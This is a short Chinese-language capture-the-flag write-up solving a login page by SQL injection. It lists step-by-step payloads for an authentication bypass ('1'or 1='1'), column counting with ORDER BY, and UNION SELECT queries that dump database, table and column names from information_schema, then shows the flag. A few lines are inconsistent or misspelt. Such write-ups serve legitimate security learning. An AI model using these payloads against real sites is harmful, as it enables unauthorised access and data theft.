登录界面,继续尝试万能密码,登录进去了。
但是密码时经过加密md5加密的。
先要确定列数,payload:?username=admin' order by 3 %23 &password=1'or 1='1 登录成功 说明共有3列
payload:?username=admin' order by 3 # &password=1'or 1='1 登录失败(可能是对#有过滤)
payload:?username=admin' order by 3 # &password=1'or 1='1 回显失败
确定列数为3
确定一下回显位置,payload:?username=-1' union select 1,2,3 %23&password=-1
那么就开始sql注入吧。先进行爆库。
?sername=-1' union select 1,2,database() %23 &password=1
再爆一下表名
payload:?username=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' %23 &password=-1
得到表名后继续爆列名 payload:?username=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' %23 &password=-1
得到列名,输出一大串字符串,这里不再复制
最后得到flag在字符串的末尾
flag{50ae4e00-8561-4eb0-8897-0be2fc8a14ab}'